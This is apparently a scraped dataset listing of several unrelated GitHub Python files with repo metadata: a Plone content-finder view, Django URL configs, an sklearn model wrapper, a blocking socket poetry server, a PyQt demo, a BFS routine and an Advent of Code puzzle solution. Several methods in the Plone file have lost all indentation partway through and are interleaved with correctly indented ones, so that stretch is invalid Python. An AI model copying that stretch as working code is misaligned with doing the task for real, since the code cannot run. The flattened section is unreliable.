        rblacklist = request.get('blacklist', self.blacklist)
        sblacklist = session.get('blacklist', rblacklist)
        if sblacklist and not rblacklist and not request.get('newsession', False):
            self.blacklist = sblacklist
        else:
            self.blacklist = rblacklist
        # Use self.addtoblacklist (or addtoblacklist in request) to add elements
        # in blacklist
        addtoblacklist = request.get('addtoblacklist', self.addtoblacklist)
        for k in addtoblacklist:
            if k not in self.blacklist:
                self.blacklist.append(k)
        # Use self.removefromblacklist (or removefromblacklist in request) to
        # remove elements from blacklist
        removefromblacklist = request.get('removefromblacklist', self.removefromblacklist)
        for k in removefromblacklist:
            if k in self.blacklist:
                self.blacklist.remove(k)
        # Put new blacklist in session
        # FIXME: KISS
        if session:
            if request.get('emptyblacklist', False):
                session.set('blacklist', [])
            else:
                session.set('blacklist', self.blacklist)
        firstpassresults = self.finderResults()
        if self.sort_request and not self.sort_withcatalog:
            firstpassresults.sort(key=lambda k: k[self.sort_on])
            if self.sort_order == 'reverse':
                firstpassresults.reverse()
        # remove blacklisted uids or just set it as blacklisted if needed
        results = []
        if self.selectiontype == 'uid':
            for r in firstpassresults:
                if r['uid'] not in self.blacklist or self.typeview=='selection':
                    results.append(r)
                elif self.showblacklisted:
                    r['blacklisted'] = True
                    results.append(r)
        self.results = results
        self.folders = []
        self.rootfolders = []
        if self.browse:
            self.folders = self.finderBrowsingResults()
            if self.data['scope'] is self.data['root']:
                self.rootfolders = self.folders
            else:
                self.rootfolders = self.finderNavBrowsingResults()
        self.cleanrequest = self.cleanRequest()
        # Upload disallowed if user do not have permission to Add portal content
        # on main window context
        if self.allowupload:
            tool = getToolByName(context, "portal_membership")
            if not(tool.checkPermission('Add portal content', self.data['scope'])):
                self.allowupload = False
            if not IFinderUploadCapable.providedBy(self.data['scope']):
                self.allowupload = False
        # Allowaddfolder disallowed if user do not have permission to add portal
        # content on context disallowed also when context is not
        # IFinderUploadCapable
        # FIXME: This should require allowupload otherwise this has no sense
        if self.allowaddfolder:
            tool = getToolByName(context, "portal_membership")
            if not(tool.checkPermission('Add portal content', self.data['scope'])):
                self.allowaddfolder = False
            if not IFinderUploadCapable.providedBy(self.data['scope']):
                self.allowaddfolder = False
        # NOTE(review): cleanrequest was already computed above — this second
        # call looks redundant; confirm before removing.
        self.cleanrequest = self.cleanRequest()
        return self.template()
    def setScopeInfos(self, context, request, showbreadcrumbs):
        """Resolve the browsing root and current scope, then derive all
        scope-dependent attributes (title, type, paths, breadcrumbs).
        """
        browsedpath = request.get('browsedpath', self.browsedpath)
        portal = self.data['portal']
        # Find browser root and rootpath if undefined
        if self.data['root'] is None:
            self.data['root'] = root = aq_inner(
                portal.restrictedTraverse(self.rootpath)
            )
            if not self.rootpath:
                self.rootpath = '/'.join(root.getPhysicalPath())
        # Find scope if undefined. By default scope = browsedpath or first
        # parent folderish or context if context is a folder
        scope = self.data['scope']
        if scope is None:
            if browsedpath:
                self.data['scope'] = scope = aq_inner(portal.restrictedTraverse(browsedpath))
            else:
                folder = aq_inner(context)
                if not bool(getattr(aq_base(folder), 'isPrincipiaFolderish', False)):
                    folder = aq_inner(folder.aq_parent)
                # never anchor the finder inside portal_factory temp folders
                while "portal_factory" in folder.getPhysicalPath():
                    folder = aq_inner(folder.aq_parent)
                self.data['scope'] = scope = folder
        self.scopetitle = scope.pretty_title_or_id()
        self.scopetype = scopetype = scope.portal_type
        self.scopeiconclass = 'contenttype-%s divicon' % scopetype.lower().replace(' ','-')
        # set browsedpath and browsed_url
        self.browsedpath = '/'.join(scope.getPhysicalPath())
        self.browsed_url = scope.absolute_url()
        if scope is not self.data['root']:
            parentscope = aq_inner(scope.aq_parent)
            self.parentpath = '/'.join(parentscope.getPhysicalPath())
        # set breadcrumbs
        # TODO: use self.data['catalog']
        portal_membership = getToolByName(context, "portal_membership")
        if showbreadcrumbs:
            # walk up from the scope to the root, collecting one crumb per level
            crumbs = []
            item = scope
            itempath = self.browsedpath
            while itempath != self.rootpath:
                crumb = {}
                crumb['path'] = itempath
                crumb['title'] = item.title_or_id()
                crumb['show_link'] = portal_membership.checkPermission('View', item)
                crumbs.append(crumb)
                item = aq_inner(item.aq_parent)
                itempath = '/'.join(item.getPhysicalPath())
            crumbs.reverse()
            self.breadcrumbs = crumbs
    def finderQuery(self, topicQuery=None):
        """Build the catalog query for the main results panel.

        Precedence: an explicit ``self.query`` mapping wins; the 'selection'
        view queries the blacklisted uids themselves; otherwise a path-based
        listing (depth 1 unless a search was submitted) with optional type
        filter, catalog sorting and SearchableText terms.
        NOTE(review): the *topicQuery* parameter is unused here.
        """
        request = self.request
        if self.query:
            return self.query
        elif self.typeview == 'selection':
            return {'uid': self.blacklist}
        elif self.displaywithoutquery or self.searchsubmit:
            query = {}
            path = {}
            if not self.searchsubmit:
                # plain browsing: only direct children of the browsed folder
                path['depth'] = 1
            path['query'] = self.browsedpath
            query['path'] = path
            sort_index = self.sort_on
            if self.sort_withcatalog:
                query['sort_on'] = sort_index
                query['sort_order'] = self.sort_order
            if self.types:
                query['portal_type'] = self.types
            if self.searchsubmit:
                # TODO: use a dynamic form with different possible searchform fields
                q = request.get('SearchableText', '')
                if q:
                    # strip query operators, AND-join the words, escape parens,
                    # and add a trailing wildcard
                    for char in '?-+*':
                        q = q.replace(char, ' ')
                    r=q.split()
                    r = " AND ".join(r)
                    searchterms = _quote_bad_chars(r)+'*'
                    query['SearchableText'] = searchterms
            return query
def finderNavBrowsingResults(self, querypath=''):
"""Left navigation subtree results
"""
if not querypath:
querypath = self.rootpath
return self.finderBrowsingResults(querypath=querypath, isnav=True)
def finderBrowsingQuery(self, querypath=None):
"""Return query for folderishs to browse
"""
if self.browse:
path = {'depth': 1}
if querypath:
path['query'] = querypath
else:
path['query'] = self.browsedpath
return {
'path': path,
'is_folderish': True,
'sort_on': 'getObjPositionInParent'
}
def finderBrowsingResults(self, querypath=None, isnav=False):
"""Return results to browse method used for finder left navigation and
navigation inside main window
"""
cat = self.data['catalog']
query = self.finderBrowsingQuery(querypath)
brains = cat(**query)
results = []
for b in brains:
r = {}
r['uid'] = b.UID
r['url'] = b.getURL()
r['title'] = b.pretty_title_or_id()
r['jstitle'] = r['title'].replace("\x27", "\x5C\x27")
r['description'] = b.Description
r['iconclass'] = 'contenttype-%s divicon' % b.portal_type.lower().replace(' ','-')
r['type'] = b.portal_type
r['path'] = b.getPath()
r['state_class'] = 'state-%s' % b.review_state
r['path_class'] = ''
r['sub_folders'] = []
if isnav:
r['path_class'] = getPathClass(self.browsedpath, r['path'])
# if browser path is current or current node
# search for subfolders
if r['path_class']:
r['sub_folders'] = self.finderNavBrowsingResults(querypath=r['path'])
results.append(r)
return results
def finderResults(self):
"""Return results to select
"""
cat = self.data['catalog']
scope = self.data['scope']
if HAS_AT and IATTopic.providedBy(scope):
supQuery = self.finderQuery()
if supQuery.has_key('path'):
del supQuery['path']
brains = finderTopicsQueryCatalog(scope, cat, **supQuery)
else:
query = self.finderQuery()
brains = cat(**query)
results = []
for b in brains:
title_or_id = b.pretty_title_or_id()
r = {
'uid': b.UID,
'url': b.getURL(),
'path': b.getPath(),
'title': title_or_id,
'jstitle': title_or_id.replace("\x27", "\x5C\x27"),
'description':b.Description,
'state_class': 'state-%s' % b.review_state,
'is_folderish': b.is_folderish or False,
'size': b.getObjSize,
'type': b.portal_type,
'blacklisted': False,
'created': b.created,
'actions_menu': {}
}
if r['type'] in self.imagestypes:
o = b.getObject()
imageInfos = self.getImageInfos(o)
orientation = imageInfos[0]
width = imageInfos[1]
height = imageInfos[2]
if width and height:
# FIXME: This should go in config.py
min, max = 70, 100
if orientation == 'portrait':
ratio = float(width)/float(height)
if height > max:
width = int(ratio *max)
height = max
if width > min:
width = min
height = int(min/ratio)
else:
ratio = float(height)/float(width)
if width > max:
height = int(ratio *max)
width = max
if height > min:
height = min
width = int(min/ratio)
thumb_sizes = self.getThumbSizes()
# define thumb icon and preview urls for display
thumb = icon = '%s/image' % r['url']
preview = '%s/image?isImage=1' % r['url']
for ts in thumb_sizes:
if ts[1] >= width and ts[2] >= height:
thumb = '%s/@@images/image/%s' % (r['url'], ts[0])
break
for ts in thumb_sizes:
if ts[1] >= 16 and ts[2] >= 16:
icon = '%s/@@images/image/%s' % (r['url'], ts[0])
break
for ts in thumb_sizes:
if ts[1] >= 400 and ts[2] >= 400:
preview = '%s/@@images/image/%s?isImage=1' % (r['url'], ts[0])
break
# images sizes actions menu
thumb_sizes.extend([('full', width, height, _('Full size'), '/@@images/image')])
if self.allowimagesizeselection:
r['actions_menu']['choose_image_size'] = {
'label': _(u'Choose image size'),
'actions': thumb_sizes
}
r.update({
'is_image': True,
'preview_url': preview,
'url': '%s/image' % r['url'],
'container_class': 'imageContainer',
'style': 'width: %ipx; height: %ipx' % (width, height)
})
else:
orientation = 'small'
thumb = icon = None
r.update({
'iconclass': ('contenttype-%s divicon' %
b.portal_type.lower().replace(' ','-')),
'is_image': False,
'container_class': 'fileContainer',
'style': ''
})
else:
# Not an image type
orientation = 'small'
r['style'] = ''
if b.portal_type in self.filestypes:
o = b.getObject()
icon_base = o.getIcon()
if icon_base:
r['style'] = 'background-image: url(./%s)' % icon_base
r['iconclass'] = 'contenttype-%s divicon' % b.portal_type.lower().replace(' ','-')
thumb = icon = None
r['is_image'] = False
r['container_class'] = 'fileContainer'
if self.typeview == 'image':
r['orientation_class'] = orientation
r['thumb'] = thumb
else:
r['orientation_class'] = '%s_icon' % orientation
r['thumb'] = icon
if r['size']:
r['real_size'] = float(r['size'].split(' ')[0])
else:
r['real_size'] = 0
results.append(r)
return results
    def getThumbSizes(self):
        """Return an ordered list of thumb sizes taken from portal properties
        imaging properties when exists list of tuples [(label, width, height,
        thumb_label, thumb_extension), ...], sorted by ascending width.
        Falls back to the standard Plone scale list when the imaging
        properties sheet is absent.
        FIXME: This is too much associated with standard ATImage. We should proceed
        with views/adapters
        """
        context = aq_inner(self.context)
        pprops = getToolByName(context, 'portal_properties')
        if hasattr(pprops, 'imaging_properties'):
            imaging_properties = pprops.imaging_properties
            thumb_sizes_props = imaging_properties.getProperty('allowed_sizes')
            thumb_sizes = []
            for prop in thumb_sizes_props:
                # each property line looks like 'name width:height'
                propInfo = prop.split(' ')
                thumb_name = propInfo[0]
                thumb_width = int(propInfo[1].split(':')[0])
                thumb_height = int(propInfo[1].split(':')[1])
                thumb_label = "%s : %ipx*%ipx" % (_(thumb_name.capitalize()), thumb_width,
                                                  thumb_height)
                thumb_extension = "/@@images/image/%s" % thumb_name
                thumb_sizes.append((thumb_name, thumb_width, thumb_height, thumb_label,
                                    thumb_extension))
            thumb_sizes.sort(key=lambda ts: ts[1])
            return thumb_sizes
        return [
            ('listing', 16, 16, '%s : 16px*16px' % _('Listing'), '/@@images/image/listing'),
            ('icon', 32, 32, '%s : 32px*32px' % _('Icon'), '/@@images/image/icon'),
            ('tile', 64, 64, '%s : 64px*64px' % _('Tile'), '/@@images/image/tile'),
            ('thumb', 128, 128, '%s : 128px*128px' % _('Thumb'), '/@@images/image/thumb'),
            ('mini', 200, 200, '%s : 200px*200px' % _('Mini'), '/@@images/image/mini'),
            ('preview', 400, 400, '%s : 400px*400px' % _('Preview'), '/@@images/image/preview'),
            ('large', 768, 768, '%s : 768px*768px' % _('Large'), '/@@images/image/large')
        ]
def getImageSize(self, image_obj):
if HAS_PAC:
if (
IImage.providedBy(image_obj) or IImage.providedBy(image_obj)
):
return image_obj.image.getImageSize()
field = image_obj.getField('image')
if field.type in ("blob", "file", "image"):
return field.getSize(image_obj)
elif field.type == "reference":
return field.get(image_obj).getSize()
else:
raise ValueError("image field type unknown")
def getImageInfos(self, image_obj):
"""Return orientation width and height
# FIXME: This is too much associated to ATImage stuffs.
We should proceed with adapters
# FIXME: This should be a function, not a method
"""
im_width, im_height = self.getImageSize(image_obj)
if im_height >= im_width:
orientation = 'portrait'
else:
orientation = 'landscape'
return orientation, im_width, im_height
def cleanRequest(self):
"""Remove some params in request and store some of them for next request
FIXME: rename this 'cleanQuery' and make this a function that takes the
request as parameter
"""
request = self.request
ignored = ('blacklist', 'addtoblacklist', 'removefromblacklist', 'searchsubmit',
'newsession', 'emptyblacklist', 'b_start', 'finder_sort_on',
'sort_order')
dictRequest = {}
for param, value in request.form.items():
if (value is not None and
(param not in ignored) and
(param not in FORM_PARAMS)):
dictRequest[param] = value
return dictRequest
    def cleanQuery(self):
        """Make a query_string with clean Request
        """
        # make_query (ZTUtils) url-encodes the already-filtered request mapping
        return make_query(self.cleanrequest)
| [
"gotcha@bubblenet.be"
] | gotcha@bubblenet.be |
3a56b6f97c3d4e588816a71be172663550a6088c | c6ef2c75b9015ecc1ddb8a47f2ceeb96c83750d1 | /project10/f10.py | c57f30573d8c22ec098752b3bbfa1e50617d90cf | [] | no_license | feng1234-debug/pn | 7b5202894868efef2ab1e7e05d0f51e38f7a13c5 | c0250c516e1cc904b6e5f8bf06178d558c08b9b9 | refs/heads/master | 2022-12-03T22:24:33.617251 | 2020-07-31T12:00:42 | 2020-07-31T12:00:42 | 284,025,178 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 237 | py | #coding=utf-8
import unittest
from project10.init import *
class BaiduSo(Init):
    """Smoke test: type a query into Baidu's search box (element id 'kw')."""
    def test_baidu_news(self):
        # NOTE(review): find_element_by_id is removed in Selenium 4 —
        # confirm the pinned selenium version if this stops working.
        self.driver.find_element_by_id('kw').send_keys('webdriver')
if __name__=='__main__':
    # verbosity=2 prints each test name as it runs
    unittest.main(verbosity=2)
"1906463435@qq.com"
] | 1906463435@qq.com |
5c967d1261382dabf68373611c9c6a88a9637416 | 5c94e4df517745a564250f5a066d1c05dcf02c24 | /car/urls.py | 859568ed746d4f78c16e1f1d97d30b3408f91568 | [] | no_license | aysenurozbay/Airport_Transfer_with_Python_Django | e4cd4310f0121f5ecf6ca97f33c466de8ff6bc2a | e5a31d59ec6e968e996ee75542bd4891e53c466a | refs/heads/master | 2023-06-05T20:43:19.860280 | 2021-07-02T12:06:51 | 2021-07-02T12:06:51 | 347,430,605 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 471 | py | from django.urls import path
from . import views
urlpatterns = [
# ex: /home/
path('', views.index, name='index'),
path('addcomment/<int:id>', views.addcomment, name='addcomment'),
# ex: /home/5/
# path('<int:question_id>/', views.detail, name='detail'),
# # ex: /home/5/results/
# path('<int:question_id>/results/', views.results, name='results'),
# # ex: /home/5/vote/
# path('<int:question_id>/vote/', views.vote, name='vote'),
] | [
"aysenurozbay1004@gmail.com"
] | aysenurozbay1004@gmail.com |
0d938df3b03127a2fd218275a8f7468023f1eeab | 990f80e42ea5a02406e8dd9fb5a4ade34b666aaf | /src/model.py | 4e86aebdfeddefe05f803662aef5bf05bd0afd64 | [
"Apache-2.0"
] | permissive | kim0215/xai-bench | 09a3f54d589dea92dd4072b59d0ce0cc5529f964 | 5bdccf5aeedaa743d398b2a028d189f72a83b3d3 | refs/heads/main | 2023-06-16T00:59:03.644563 | 2021-07-06T09:55:37 | 2021-07-06T09:55:37 | 383,399,139 | 0 | 0 | Apache-2.0 | 2021-07-06T08:38:39 | 2021-07-06T08:38:39 | null | UTF-8 | Python | false | false | 1,097 | py | from sklearn.linear_model import LinearRegression
from sklearn.neural_network import MLPRegressor, MLPClassifier
from sklearn.tree import DecisionTreeRegressor, DecisionTreeClassifier
# mode -> model name -> factory. The 'dataset' entry is a sentinel whose
# factory returns the string "dataset" instead of an estimator.
valid_models = {
    "regression": {
        "dataset": lambda : "dataset",
        "lr": LinearRegression,
        "mlp": MLPRegressor,
        "dtree": DecisionTreeRegressor,
    },
    "classification": {
        "dataset": lambda : "dataset",
        # NOTE(review): LinearRegression (not LogisticRegression) is mapped to
        # 'lr' for classification too — confirm this is intentional.
        "lr": LinearRegression,
        "mlp": MLPClassifier,
        "dtree": DecisionTreeClassifier,
    },
}
class Model:
    """Thin wrapper selecting an estimator by (name, mode).

    ``name`` must be a key of ``valid_models[mode]``; extra keyword arguments
    are forwarded to the estimator constructor. The special name ``"dataset"``
    yields a sentinel with no ``predict``/``train`` attributes.
    """

    def __init__(self, name, mode, **kwargs):
        # membership test on the dict itself instead of .keys()
        if name not in valid_models[mode]:
            raise NotImplementedError(
                f"This model is not supported at the moment. Models supported are: {list(valid_models[mode].keys())}"
            )
        self.name = name
        self.mode = mode
        self.model = valid_models[mode][name](**kwargs)
        if self.model == "dataset":
            # sentinel: no estimator to expose
            return
        self.predict = self.model.predict
        # bind fit as `train` only when the estimator has one; hasattr is
        # robust where truth-testing a missing attribute would raise
        if hasattr(self.model, "fit"):
            self.train = self.model.fit
| [
"sujay@abacus.ai"
] | sujay@abacus.ai |
54bfcb090bd4baa24613099536b292275b29c316 | eab36f5adb15ba24acb51ace389959fa9592346f | /demos/slow_pemos.py | c99f41c5affde99287e931a8af691c950fb15f62 | [] | no_license | yance-dev/twdemo | ebda30c32dae3e722e740b71fe5623a6f47ff70f | e331f5a1c13df1d9e5bc2bba8a9a50dfd9b6b2ba | refs/heads/master | 2022-02-07T10:29:28.804627 | 2019-06-14T16:57:39 | 2019-06-14T16:57:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,795 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@Author : Young
@Email : hyc554@outlook.com
@site : http://www.cnblogs.com/huang-yc/
@File : slow_pemos.py
@version : 1.0
@Time : 2019/6/14 0:28
Description about this file:
"""
# This is the blocking version of the Slow Poetry Server.
import optparse, os, socket, time
def parse_args():
usage = """usage: %prog [options] poetry-file
This is the Slow Poetry Server, blocking edition.
Run it like this:
python slowpoetry.py <path-to-poetry-file>
If you are in the base directory of the twisted-intro package,
you could run it like this:
python blocking-server/slowpoetry.py poetry/ecstasy.txt
to serve up John Donne's Ecstasy, which I know you want to do.
"""
parser = optparse.OptionParser(usage)
help = "The port to listen on. Default to a random available port."
parser.add_option('--port', type='int', help=help)
help = "The interface to listen on. Default is localhost."
parser.add_option('--iface', help=help, default='localhost')
help = "The number of seconds between sending bytes."
parser.add_option('--delay', type='float', help=help, default=.7)
help = "The number of bytes to send at a time."
parser.add_option('--num-bytes', type='int', help=help, default=10)
options, args = parser.parse_args()
if len(args) != 1:
parser.error('Provide exactly one poetry file.')
poetry_file = args[0]
if not os.path.exists(args[0]):
parser.error('No such file: %s' % poetry_file)
return options, poetry_file
def send_poetry(sock, poetry_file, num_bytes, delay):
"""Send some poetry slowly down the socket."""
inputf = open(poetry_file)
while True:
bytes = inputf.read(num_bytes)
if not bytes: # no more poetry :(
sock.close()
inputf.close()
return
print('Sending %d bytes' % len(bytes))
try:
sock.sendall(bytes) # this is a blocking call
except socket.error:
sock.close()
inputf.close()
return
time.sleep(delay)
def serve(listen_socket, poetry_file, num_bytes, delay):
while True:
sock, addr = listen_socket.accept()
print('Somebody at %s wants poetry!' % (addr,))
send_poetry(sock, poetry_file, num_bytes, delay)
def main():
options, poetry_file = parse_args()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((options.iface, options.port or 0))
sock.listen(5)
print('Serving %s on port %s.' % (poetry_file, sock.getsockname()[1]))
serve(sock, poetry_file, options.num_bytes, options.delay)
if __name__ == '__main__':
main()
| [
"1415940604@qq.com"
] | 1415940604@qq.com |
3d9072edf03e4acc4fe1f25213806717135148c8 | 985016ed7587f38f6c43a37f515c60aa65ecf2b7 | /stackGuiTest.py | b0ff2d2b7b1cdc9d191c5736e6d4f1519a834498 | [] | no_license | MichaelD7/hydraulics | 101274f5139dca638a264707fd43cebc08e1bfc0 | 31575fb9ac15dffea0d85cf6d7fd7cd8c7204c17 | refs/heads/master | 2023-08-30T21:23:09.348671 | 2023-08-07T18:06:25 | 2023-08-07T18:06:25 | 112,238,099 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,576 | py | import sys
from PyQt5.QtWidgets import (QWidget, QLabel, QHBoxLayout, QApplication,
QLineEdit, QStackedWidget, QComboBox)
class Application(QWidget):
def __init__(self):
super().__init__()
self.myCombo = QComboBox()
self.myCombo.addItem("circle")
self.myCombo.addItem("square")
self.myCombo.addItem("trapezoid")
self.stack1 = QWidget()
self.stack2 = QWidget()
self.stack3 = QWidget()
self.stack1UI()
self.stack2UI()
self.stack3UI()
self.stack = QStackedWidget(self)
self.stack.addWidget(self.stack1)
self.stack.addWidget(self.stack2)
self.stack.addWidget(self.stack3)
layout = QHBoxLayout(self)
layout.addWidget(self.myCombo)
layout.addWidget(self.stack)
self.setLayout(layout)
self.myCombo.currentIndexChanged.connect(self.stack.setCurrentIndex)
self.show()
def stack1UI(self):
layout = QHBoxLayout()
layout.addWidget(QLabel("circle"))
layout.addWidget(QLineEdit())
self.stack1.setLayout(layout)
def stack2UI(self):
layout = QHBoxLayout()
layout.addWidget(QLabel("square"))
layout.addWidget(QLineEdit())
self.stack2.setLayout(layout)
def stack3UI(self):
layout = QHBoxLayout()
layout.addWidget(QLabel("trapezoid"))
layout.addWidget(QLineEdit())
self.stack3.setLayout(layout)
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = Application()
sys.exit(app.exec_())
| [
"mdevenish@Unknown-3c-15-c2-e8-1e-c6.home"
] | mdevenish@Unknown-3c-15-c2-e8-1e-c6.home |
deacbd1826fa9af6bb62b41abd639031a0564244 | ab14e4a26a86e0395233c0408653753dbe4b3ddb | /carshop/urls.py | 0daee275a28b15f4e578f00fbf6d148b4ebb36aa | [] | no_license | berzezek/LCMotorkorea | fda0f46c3fd281a229ddfdd34e9c6721019585b5 | b941b50fb2631aa13861cd03b10fa229045f899b | refs/heads/main | 2023-08-20T00:57:10.851716 | 2021-10-20T11:55:16 | 2021-10-20T11:55:16 | 419,308,886 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 695 | py | from django.apps import apps
from django.urls import include, path
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('i18n/', include('django.conf.urls.i18n')),
# The Django admin is not officially supported; expect breakage.
# Nonetheless, it's often useful for debugging.
path('admin/', admin.site.urls),
path('', include(apps.get_app_config('oscar').urls[0])),
path('carshop/', include('blog.urls')),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
urlpatterns += static(settings.MEDIA_URL, document_root=settings.STATIC_ROOT) | [
"wknduz@gmail.com"
] | wknduz@gmail.com |
2f9ed8f88eaed4cef0b27b28ffe5d938f18705d8 | 1ff422ebe22dffad5dd2324c5629891a377cf070 | /Tree_Algorithms/Breadth_First_Search.py | c9bb6f99c7d54536d62fa16333e29a6d1f458b1b | [] | no_license | duxuan1/Algorithms | 4db23327df444479fb7275bf0b1175a4b33fa5c4 | 73e2c42e0f697ea15e189df083fa8b7c630856fc | refs/heads/master | 2023-04-22T02:57:02.171482 | 2021-04-23T13:33:40 | 2021-04-23T13:33:40 | 278,236,896 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 866 | py | from typing import List
from Binary_Tree_ADT import *
def bfs(root: TreeNode) -> List[int]:
if not root:
return []
tree, queue = [], [root]
while queue:
node = queue.pop(0)
tree.append(node.val)
if node.left:
queue.append(node.left)
if node.right:
queue.append(node.right)
return tree
def make_tree() -> TreeNode:
"""
Return a random list of n ints.
"""
l2_1 = TreeNode(4)
l2_2 = TreeNode(5)
l2_3 = TreeNode(6)
l2_4 = TreeNode(7)
l1_1 = TreeNode(2)
l1_1.left = l2_1
l1_1.right = l2_2
l1_2 = TreeNode(3)
l1_2.left = l2_3
l1_2.right = l2_4
l0 = TreeNode(1)
l0.left = l1_1
l0.right = l1_2
return l0
if __name__ == '__main__':
root = make_tree()
result = bfs(root)
assert result == [1, 2, 3, 4, 5, 6, 7]
| [
"duxuan@moris-MacBook-Pro.local"
] | duxuan@moris-MacBook-Pro.local |
14de914eafa10449b77e6e446ba593c4617271a1 | 12d007b50d20030c4a0d8ecceaeb532b3de4f966 | /setup.py | 1ccbc3c4e37c98f182e6b3eedb9ea81800bdaf3a | [
"MIT"
] | permissive | Tygs/ayo | 8be03cf1854d122b763272ba256e3fa87135e776 | 27b2225770581e19f3abdb8db0721776f0cfb195 | refs/heads/master | 2021-11-08T02:09:37.979755 | 2021-11-01T10:44:35 | 2021-11-01T10:44:35 | 136,607,852 | 32 | 2 | null | null | null | null | UTF-8 | Python | false | false | 203 | py | """
Install: python setup.py install
Dev mode: python setup.py develop
Test: pip install pytest && pytest tests
All the config is in setup.cfg
"""
import setuptools
setuptools.setup()
| [
"lesametlemax@gmail.com"
] | lesametlemax@gmail.com |
1630a177235531d37be13c21a34a1295f329121c | 74c9ed9dd153d8de3fa92f0b50def446fdaae941 | /GeoLocation/measurements/forms.py | 365eb473c8a81925c746c1dec5a6de7f641f7087 | [] | no_license | riyadh9292/Geolocator | d5fa43fba53a1d3b7905ae367e802b8482f16abd | 57467a623bd3b86aca9dffc300c2771fdd560919 | refs/heads/main | 2023-04-07T23:29:53.368318 | 2021-04-17T11:33:53 | 2021-04-17T11:33:53 | 358,861,759 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 177 | py | from django import forms
from .models import Measurement
class MeasurementModelForm(forms.ModelForm):
class Meta:
model=Measurement
fields=('destination',)
| [
"mrriyadh66@gmail.com"
] | mrriyadh66@gmail.com |
4679a7de5f74b6b814a0779e2dea65db07e1130f | 2283023a328151e0b63cd32bba2354561b28280a | /library/urls.py | 3df1da8213b316e4c3a2d3894c67bf7e639d9217 | [] | no_license | xsypck/library | 1111d4919daa8d4e027c871a590db69ef2cb828c | b47727cfa6809462583ff50f2d8488686d707d17 | refs/heads/main | 2023-04-15T22:27:19.718813 | 2021-05-03T01:43:26 | 2021-05-03T01:43:26 | 363,660,681 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,105 | py | """library URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from login import views
#在浏览器输入路径,找到这里,指向view中的函数
urlpatterns = [
path('admin/', admin.site.urls),
path('login/',views.index),#path(route, view, kwargs=None, name=None)
path('calpage/',views.calpage),#不是调用函数,只是指给它
path('cal',views.cal),
path('list',views.callist),
path('clean',views.clean),
path('home/',views.home)
]
| [
"838816528"
] | 838816528 |
20b54568767dfde2e2e6ceae5e419b216c77a75a | f26e6c9fc3d9311067eb12bb8d50cecc610831bc | /day23/cups.py | 36d0de2e2dff1c362942480ae068319acfcc2b35 | [] | no_license | drewhayward/advent-of-code-2020 | 9a8bc79d7f76460f6fafb4b50032a267515657f3 | a5f5a6b6306a8dc65434038ae2b72ffd0cb8ee74 | refs/heads/master | 2023-02-06T12:53:48.628880 | 2020-12-26T03:06:21 | 2020-12-26T03:06:21 | 324,471,160 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,611 | py | from tqdm import trange
class Node:
def __init__(self, value):
self.next = None
self.prev = None
self.value = value
class CircularLinkedList:
def __init__(self, items):
self.node_map = {}
self.current_node = Node(items[0])
self.node_map[self.current_node.value] = self.current_node
self.max_value = max(items)
past = self.current_node
for item in items[1:]:
node = Node(item)
self.node_map[item] = node
past.next = node
node.prev = past
past = node
past.next = self.current_node
self.current_node.prev = past
def __str__(self):
s = ''
s += f'({str(self.current_node.value)})'
pos = self.current_node.next
while pos != self.current_node:
s += f' {pos.value}'
pos = pos.next
return s
def find(self, value):
return self.node_map[value]
def move(self):
# Trim the group out
group_start = self.current_node.next
group_start.prev = None
group_end = group_start.next.next
group = [group_start, group_start.next, group_start.next.next]
self.current_node.next = group_end.next
group_end.next.prev = self.current_node
group_end.next = None
# Look for the target
target_value = ((self.current_node.value - 2) % self.max_value) + 1
target = self.find(target_value)
while target in group:
target_value = ((target_value - 2) % self.max_value) + 1
target = self.find(target_value)
# Splice in the group
target_end = target.next
group_start.prev = target
target.next = group_start
group_end.next = target_end
target_end.prev = group_end
self.current_node = self.current_node.next
def part_1():
clist = CircularLinkedList([5, 8, 6, 4, 3, 9, 1, 7, 2])
for _ in range(100):
clist.move()
one_node = clist.find(1)
s = ''
current_node = one_node.next
while current_node != one_node:
s += str(current_node.value)
current_node = current_node.next
return s
def part_2():
#nums = [3,8,9,1,2,5,4,6,7]
nums = [5, 8, 6, 4, 3, 9, 1, 7, 2]
nums.extend(range(10, 1000001))
clist = CircularLinkedList(nums)
for _ in trange(10000000):
clist.move()
one_node = clist.node_map[1]
return one_node.next.value * one_node.next.next.value
if __name__ == "__main__":
print(part_1())
print(part_2())
| [
"d.andrew.hayward@gmail.com"
] | d.andrew.hayward@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.